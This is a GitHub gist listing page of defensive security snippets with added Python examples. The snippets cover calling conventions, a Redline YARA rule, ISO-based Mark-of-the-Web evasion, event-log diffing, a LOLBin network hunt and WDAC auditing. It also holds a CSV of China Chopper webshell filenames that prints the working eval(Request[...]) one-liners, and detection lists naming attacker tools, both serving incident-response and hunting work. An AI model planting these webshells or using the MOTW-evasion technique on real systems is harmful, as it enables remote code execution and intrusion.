Dan danzek
@sucremad
sucremad / callcon.md
Last active November 19, 2021 12:28
Function Call Conventions

Most Common Calling Conventions

The most common are cdecl, stdcall, and fastcall.

In function calls, parameters are pushed onto the stack from right to left.

Example Function Pseudo Code

int func(int x, int y, int z, int m, int k);
 
int a, b, c, d, e, ret;
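A worked model of the three conventions, added here as an example and not part of the callcon.md gist. The right-to-left rule above describes cdecl and stdcall on x86-32; under Microsoft fastcall the first two DWORD-sized arguments travel in ECX and EDX and only the remaining ones are pushed, which the model includes. The stack is simulated as 4-byte words growing toward lower addresses so the layout the callee sees at entry ([esp+4] is the first stack argument because [esp] holds the return address) and who removes the arguments afterwards can be checked without a 32-bit toolchain; the initial ESP and the return address are constructed values.

```python
"""x86-32 argument passing under cdecl, stdcall and fastcall, as a model.

Added example, not part of the callcon.md gist. ESP and return-address
values are constructed; the rules (push order, register use, who cleans
the stack) are the real ones for the three conventions.
"""

WORD = 4
STACK_TOP = 0x0019FF00      # constructed initial ESP
RET_ADDR = 0x00401000       # constructed return address that CALL pushes


class Machine:
    def __init__(self):
        self.esp = STACK_TOP
        self.mem = {}           # address -> 32-bit word
        self.ecx = 0
        self.edx = 0

    def push(self, value):
        self.esp -= WORD
        self.mem[self.esp] = value & 0xFFFFFFFF

    def pop(self):
        value = self.mem[self.esp]
        self.esp += WORD
        return value


def emit_call(m, conv, args):
    """Caller side: pass args, then emulate CALL. Returns words pushed for args."""
    first_on_stack = 0
    if conv == "fastcall":
        # Microsoft fastcall: first two DWORD-sized args in ECX and EDX
        if len(args) > 0:
            m.ecx = args[0]
        if len(args) > 1:
            m.edx = args[1]
        first_on_stack = min(2, len(args))
    # Right to left: the last argument is pushed first, so the first stack
    # argument lands nearest ESP and its offset is independent of the
    # argument count (this is what lets cdecl support variadic functions).
    for value in reversed(args[first_on_stack:]):
        m.push(value)
    m.push(RET_ADDR)
    return len(args) - first_on_stack


def callee_view(m, conv, nargs):
    """Callee side at entry: (location, value) for each argument, in order."""
    view = []
    if conv == "fastcall":
        view.extend([("ecx", m.ecx), ("edx", m.edx)][:nargs])
    k = 0
    while len(view) < nargs:
        off = WORD * (1 + k)    # [esp] is the return address; args start at [esp+4]
        view.append((f"[esp+{off}]", m.mem[m.esp + off]))
        k += 1
    return view


def emit_ret(m, conv, stack_words):
    """Callee returns. Gives the bytes the caller must add to ESP afterwards."""
    m.pop()                             # RET pops the return address
    if conv == "cdecl":
        return stack_words * WORD       # caller cleans up: add esp, N
    m.esp += stack_words * WORD         # callee cleans up: ret N
    return 0


def simulate(conv, args):
    """Run one call under conv; report layout, cleanup and stack balance."""
    if conv not in ("cdecl", "stdcall", "fastcall"):
        raise ValueError(conv)
    m = Machine()
    words = emit_call(m, conv, args)
    view = callee_view(m, conv, len(args))
    cleanup = emit_ret(m, conv, words)
    m.esp += cleanup                    # the caller's add esp, N (cdecl only)
    return {"args": view, "caller_adds": cleanup, "balanced": m.esp == STACK_TOP}


if __name__ == "__main__":
    # int func(int x, int y, int z, int m, int k) called as func(1, 2, 3, 4, 5)
    for conv in ("cdecl", "stdcall", "fastcall"):
        print(conv, simulate(conv, [1, 2, 3, 4, 5]))
```

When reversing, the `add esp, 20` after a call is the cdecl signature for five stack arguments, a `ret 14h` inside the callee is stdcall, and a function that reads ECX and EDX before touching the stack is fastcall.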
rule redline_new_bin
{
meta:
description = "Redline stealer"
author = "James_inthe_box"
reference = "https://app.any.run/tasks/4921d1fe-1a14-4bf2-9d27-c443353362a8"
date = "2021/06"
maltype = "Stealer"
strings:
@mgraeber-rc
mgraeber-rc / SimulateInternetZoneTest.ps1
Created May 28, 2021 16:57
Example highlighting why attackers likely choose ISO/IMG as a delivery mechanism - it evades SmartScreen because Mark-of-the-Web (MOTW) cannot be applied to non-NTFS volumes
Add-Type -OutputAssembly hello.exe -TypeDefinition @'
using System;
public class Hello {
public static void Main(string[] Args) {
System.Console.WriteLine("Hello, world!");
System.Console.Read();
}
}
'@
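The check a responder wants alongside that test: read and interpret a file's Mark-of-the-Web. This is an added example, not part of the SimulateInternetZoneTest.ps1 gist. MOTW is the Zone.Identifier NTFS alternate data stream, a small INI-style block; parse_zone_identifier() interprets the stream text and read_motw() opens the stream by its path:Zone.Identifier name on Windows, returning None when it is absent, which is what a file inside a mounted ISO/IMG (a volume that cannot hold alternate data streams) looks like. The sample streams are constructed.

```python
"""Read and interpret a file's Mark-of-the-Web (Zone.Identifier stream).

Added example, not part of the gist. The sample streams below are
constructed; the field names and zone numbers are the real ones.
"""
import os

ZONE_NAMES = {0: "My Computer", 1: "Local intranet", 2: "Trusted sites",
              3: "Internet", 4: "Restricted sites"}

# Constructed streams: one as a browser writes it, one for a local copy
DOWNLOADED = ("[ZoneTransfer]\r\nZoneId=3\r\n"
              "ReferrerUrl=https://example.test/\r\n"
              "HostUrl=https://example.test/hello.exe\r\n")
LOCAL_COPY = "[ZoneTransfer]\r\nZoneId=0\r\n"


def parse_zone_identifier(text):
    """Parse Zone.Identifier text; None if it carries no usable ZoneId."""
    section = None
    fields = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section != "ZoneTransfer" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        fields[key.strip()] = value.strip()
    try:
        zone = int(fields["ZoneId"])
    except (KeyError, ValueError):
        return None
    return {
        "zone": zone,
        "zone_name": ZONE_NAMES.get(zone, "Unknown"),
        "referrer": fields.get("ReferrerUrl"),
        "host": fields.get("HostUrl"),
        # zone 3 is what browser downloads carry and what MOTW checks look for
        "internet": zone == 3,
    }


def read_motw(path):
    """Parsed MOTW for path, or None when the file has no Zone.Identifier.

    Alternate data streams exist only on NTFS. On FAT/exFAT, CDFS or UDF
    (a mounted ISO) the stream cannot exist, so the open fails and the file
    is treated as if it had never been downloaded.
    """
    if os.name != "nt":
        raise OSError("alternate data streams are only addressable on Windows")
    try:
        with open(path + ":Zone.Identifier", encoding="utf-8", errors="replace") as f:
            return parse_zone_identifier(f.read())
    except OSError:     # missing stream, or a volume that cannot hold one
        return None


if __name__ == "__main__":
    for label, text in (("downloaded", DOWNLOADED), ("local copy", LOCAL_COPY)):
        print(label, parse_zone_identifier(text))
```

To reproduce the gist's point on a Windows box, write DOWNLOADED into hello.exe's Zone.Identifier stream on NTFS, confirm read_motw() reports zone 3, then build an ISO containing the same file, mount it and call read_motw() on the mounted copy: it returns None, and that is the file SmartScreen never sees as an Internet download.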
@mgraeber-rc
mgraeber-rc / EventDiff.ps1
Created May 28, 2021 14:45
Display only new event log events - I refer to this as event log differential analysis
# Log the time prior to executing the action.
# This will be used as part of an event log XPath filter.
$DateTimeBefore = [Xml.XmlConvert]::ToString((Get-Date).ToUniversalTime(), [System.Xml.XmlDateTimeSerializationMode]::Utc)
# Do the thing now that you want to see potential relevant events surface...
$null = Mount-DiskImage -ImagePath "$PWD\FeelTheBurn.iso" -StorageType ISO -Access ReadOnly
# Allow a moment to allow events to populate
Start-Sleep -Seconds 5
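The filtering half of that approach, as an added example that is not part of the EventDiff.ps1 gist: take a UTC timestamp before the action, do the action, then keep only events created at or after that timestamp. utc_marker() produces the marker in the SystemTime form the event XML uses, xpath_since() builds the -FilterXPath string Get-WinEvent would take, and new_events() applies the same cut to events already collected. The event rows are constructed.

```python
"""Event log differential analysis: keep only what happened after a marker.

Added example, not part of the gist. SAMPLE_EVENTS are constructed rows
shaped like exported Windows events; the XPath form is the real one.
"""
from datetime import datetime, timezone


def utc_marker(now=None):
    """Timestamp taken before the action, formatted like the SystemTime attribute."""
    now = now or datetime.now(timezone.utc)
    # Windows writes seven fractional digits; pad Python's six with a zero
    return now.strftime("%Y-%m-%dT%H:%M:%S.") + f"{now.microsecond:06d}0Z"


def xpath_since(marker):
    """XPath for Get-WinEvent -FilterXPath: events created at or after marker."""
    return f"*[System[TimeCreated[@SystemTime>='{marker}']]]"


def parse_system_time(value):
    """Parse '2021-05-28T14:45:07.1234567Z' into an aware UTC datetime."""
    base, _, frac = value.rstrip("Z").partition(".")
    frac = (frac + "000000")[:6]          # Python accepts at most microseconds
    return datetime.fromisoformat(f"{base}.{frac}").replace(tzinfo=timezone.utc)


def new_events(events, marker):
    """Events created at or after the marker (>=, so same-second events count)."""
    t0 = parse_system_time(marker)
    return [e for e in events if parse_system_time(e["SystemTime"]) >= t0]


def summarize(events):
    """Count (Provider, EventID) pairs so the new activity reads at a glance."""
    counts = {}
    for e in events:
        key = (e["Provider"], e["EventID"])
        counts[key] = counts.get(key, 0) + 1
    return counts


# Constructed rows: one before the marker, three from the action onward
MARKER = "2021-05-28T14:45:00.0000000Z"
SAMPLE_EVENTS = [
    {"SystemTime": "2021-05-28T14:44:58.5000000Z",
     "Provider": "Microsoft-Windows-Security-Auditing", "EventID": 4688},
    {"SystemTime": "2021-05-28T14:45:00.0000000Z",
     "Provider": "Microsoft-Windows-Kernel-PnP", "EventID": 400},
    {"SystemTime": "2021-05-28T14:45:00.0312500Z",
     "Provider": "Microsoft-Windows-Kernel-PnP", "EventID": 410},
    {"SystemTime": "2021-05-28T14:45:01.7000000Z",
     "Provider": "Microsoft-Windows-Security-Auditing", "EventID": 4688},
]


if __name__ == "__main__":
    print(xpath_since(MARKER))
    for key, n in summarize(new_events(SAMPLE_EVENTS, MARKER)).items():
        print(n, *key)
```

The >= comparison matters: the Start-Sleep in the gist only gives events time to land; events logged in the same 100 ns tick as the marker are still "new" and a strict > would drop them.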
@alexverboon
alexverboon / lolbinsnetworkpublic.kql
Created May 16, 2021 14:39
Hunt for lolbins connecting to public IP addresses
// Inspiration from https://github.com/jangeisbauer/AdvancedHunting/blob/master/hunt_for_lolbins just changed Processes to Networkevents
// T1218 Living off the land binaries connecting to the internet
// network activities with lolbins
DeviceNetworkEvents
| where RemoteIPType == 'Public'
| where InitiatingProcessFileName contains "Atbroker.exe" or
InitiatingProcessFileName contains "Bash.exe" or
InitiatingProcessFileName contains "Bitsadmin.exe" or
InitiatingProcessFileName contains "Certutil.exe" or
InitiatingProcessFileName contains "Cmdkey.exe" or
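The same hunt run over sample rows, added here as an example and not part of the lolbinsnetworkpublic.kql gist. It applies the query's two conditions to DeviceNetworkEvents-shaped rows: RemoteIPType == 'Public' is approximated from the address with ipaddress.is_global, and the process check matches the file name exactly (case-insensitively) rather than with the query's `contains`, which is also case-insensitive in KQL but matches any name containing the string (so "Bash.exe" would also flag git-bash.exe); both behaviours are selectable so the difference is visible. The rows are constructed.

```python
"""LOLBins connecting to public IPs, the KQL logic run over sample rows.

Added example, not part of the gist. SAMPLE_EVENTS are constructed and the
LOLBIN list is a subset of the query's; is_global is an approximation of
the RemoteIPType == 'Public' classification.
"""
import ipaddress
from os.path import basename

# Subset of the names in the query; extend from a LOLBAS reference as needed
LOLBINS = {"atbroker.exe", "bash.exe", "bitsadmin.exe", "certutil.exe",
           "cmdkey.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}


def is_public(ip):
    """True for globally routable addresses (RemoteIPType == 'Public')."""
    try:
        return ipaddress.ip_address(ip).is_global
    except ValueError:          # malformed or missing address
        return False


def is_lolbin(file_name, exact=True):
    """Exact basename match, or KQL-style substring match when exact=False."""
    name = basename(file_name.replace("\\", "/")).lower()
    if exact:
        return name in LOLBINS
    return any(lolbin in name for lolbin in LOLBINS)


def hunt(events, exact=True):
    """Rows where a LOLBin initiated a connection to a public address."""
    return [e for e in events
            if is_public(e["RemoteIP"])
            and is_lolbin(e["InitiatingProcessFileName"], exact)]


# Constructed DeviceNetworkEvents-shaped rows
SAMPLE_EVENTS = [
    {"DeviceName": "ws01", "InitiatingProcessFileName": "certutil.exe",
     "RemoteIP": "8.8.8.8", "RemotePort": 443},
    {"DeviceName": "ws01", "InitiatingProcessFileName": "certutil.exe",
     "RemoteIP": "10.20.30.40", "RemotePort": 80},
    {"DeviceName": "ws02", "InitiatingProcessFileName": "git-bash.exe",
     "RemoteIP": "1.1.1.1", "RemotePort": 443},
    {"DeviceName": "ws02", "InitiatingProcessFileName": "MSHTA.EXE",
     "RemoteIP": "9.9.9.9", "RemotePort": 8080},
    {"DeviceName": "ws03", "InitiatingProcessFileName": "rundll32.exe",
     "RemoteIP": "100.64.0.1", "RemotePort": 445},
    {"DeviceName": "ws03", "InitiatingProcessFileName": "chrome.exe",
     "RemoteIP": "142.250.0.1", "RemotePort": 443},
]


if __name__ == "__main__":
    for row in hunt(SAMPLE_EVENTS):
        print(row["DeviceName"], row["InitiatingProcessFileName"],
              row["RemoteIP"], row["RemotePort"])
    print("substring matching adds:",
          len(hunt(SAMPLE_EVENTS, exact=False)) - len(hunt(SAMPLE_EVENTS)))
```

In the KQL itself the exact form is `InitiatingProcessFileName in~ ("certutil.exe", "mshta.exe", ...)`, which is case-insensitive set membership and avoids the substring false positives.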
@mgraeber-rc
mgraeber-rc / powershell_structured_query.xml
Created March 16, 2021 17:33
Example custom event view I used to display only relevant PowerShell logs for a demo
<QueryList>
<Query Id="0" Path="Security">
<Select Path="Security">
*[System[(EventID='4688')]]
and
*[EventData[Data[@Name='NewProcessName']='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe']]
</Select>
<Select Path="Microsoft-Windows-PowerShell/Operational">
*[System[(EventID='4104')]]
and
@JohnHammond
JohnHammond / china_chopper_webshells.csv
Last active August 14, 2023 08:23
Microsoft Exchange Incident "China Chopper" ASPX Webshell filenames
# Occurrences Webshell Filename WebShell Syntax
46 C:\inetpub\wwwroot\aspnet_client\supp0rt.aspx http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["orange"],"unsafe");}</script>
35 C:\inetpub\wwwroot\aspnet_client\discover.aspx http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script>
21 C:\inetpub\wwwroot\aspnet_client\shell.aspx http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["gttkomomo"],"unsafe");}</script>
13 C:\inetpub\wwwroot\aspnet_client\HttpProxy.aspx http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["bingo"],"unsafe");}</script>
8 C:\inetpub\wwwroot\aspnet_client\0QWYSEXe.aspx http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["XOrSeMr3kgWUdFf6"],"unsafe");}</script>
7 C:\inetpub\wwwroot\aspnet_client\system_web\error.aspx http://f/<script language=
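A detector for the shape of shell in that table, added here as an example and not part of JohnHammond's CSV. The webshell body is a single server-side JScript block whose Page_Load evals a request parameter with the "unsafe" flag; the parameter name is the shell's password. scan() finds that shape in both the `<script runat="server">` form from the table and the classic `<% ... %>` inline form that uses Request.Item, pulls out the password, and flags whether the file name is one of those listed above. The ASPX samples are constructed from the table's syntax column (the http://f/ prefix included) plus a benign page.

```python
"""Find China Chopper ASPX one-liners and recover their passwords.

Added example, not part of the gist. SAMPLES are constructed; KNOWN_NAMES
are the filenames from the table on the page.
"""
import re

KNOWN_NAMES = {"supp0rt.aspx", "discover.aspx", "shell.aspx",
               "HttpProxy.aspx", "0QWYSEXe.aspx", "error.aspx"}

# Server-side code containers: <script runat="server">...</script> or <% ... %>
# (directives such as <%@ Page %> are skipped by the lookahead)
SERVER_BLOCK_RE = re.compile(
    r'<script\b[^>]*\brunat\s*=\s*["\']?server["\']?[^>]*>(.*?)</script>'
    r'|<%(?!@)(.*?)%>',
    re.IGNORECASE | re.DOTALL)

# eval(Request["pw"],"unsafe") or eval(Request.Item["pw"],"unsafe"), any quoting
EVAL_REQUEST_RE = re.compile(
    r'eval\s*\(\s*Request(?:\.Item)?\s*\[\s*["\']([^"\']+)["\']\s*\]'
    r'\s*,\s*["\']unsafe["\']\s*\)',
    re.IGNORECASE)


def scan_source(src):
    """Passwords of every server-side eval(Request[...],"unsafe") in src."""
    found = []
    for m in SERVER_BLOCK_RE.finditer(src):
        body = m.group(1) if m.group(1) is not None else m.group(2)
        found.extend(EVAL_REQUEST_RE.findall(body))
    return found


def scan(files):
    """files: {path: source}. Findings with passwords and a filename match flag."""
    findings = []
    for path, src in files.items():
        passwords = scan_source(src)
        if passwords:
            name = path.replace("\\", "/").rsplit("/", 1)[-1]
            findings.append({"path": path, "passwords": passwords,
                             "known_name": name in KNOWN_NAMES})
    return findings


# Constructed samples
SAMPLES = {
    r"C:\inetpub\wwwroot\aspnet_client\supp0rt.aspx":
        'http://f/<script language="JScript" runat="server">'
        'function Page_Load(){eval(Request["orange"],"unsafe");}</script>',
    r"C:\inetpub\wwwroot\aspnet_client\system_web\x.aspx":
        "<script language='JScript' runat='server'>\nfunction Page_Load() {\n"
        "  eval(Request['pass'], 'unsafe');\n}\n</script>",
    r"C:\inetpub\wwwroot\owa\auth\cmd.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["pw"],"unsafe");%>',
    r"C:\inetpub\wwwroot\owa\auth\logon.aspx":
        '<%@ Page Language="C#" %>\n<script runat="server">'
        'void Page_Load(){ Response.Write("ok"); }</script>',
}


if __name__ == "__main__":
    for f in scan(SAMPLES):
        print(f["path"], f["passwords"], "known name" if f["known_name"] else "")
```

Run it over the whole web root rather than only the paths in the table: the filenames rotate between incidents, the eval-of-Request pattern does not.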
@mgraeber-rc
mgraeber-rc / Non_Microsoft_Driver_Load_Audit.xml
Created February 26, 2021 17:38
A WDAC audit-mode policy that will log all non-Windows-signed driver loads and any driver that is not WHQL or EV signed.
<?xml version="1.0" encoding="utf-8"?>
<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy">
<VersionEx>10.0.0.0</VersionEx>
<PolicyTypeID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyTypeID>
<PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID>
<Rules>
<Rule>
<Option>Enabled:Unsigned System Integrity Policy</Option>
</Rule>
<Rule>
@alexander-hanel
alexander-hanel / gogo.py
Last active March 19, 2022 18:15
GoLang Argument Parsing and Backtracing
import idaapi  # IDAPython: this script runs inside IDA

DEBUG = True


def get_basic_block(ea):
    """Return (start_ea, end_ea) of the basic block containing ea, or None
    when ea is not inside a defined function."""
    f = idaapi.get_func(ea)
    if f is None:
        return None
    fc = idaapi.FlowChart(f)
    for block in fc:
        if block.start_ea <= ea < block.end_ea:
            return block.start_ea, block.end_ea
    return None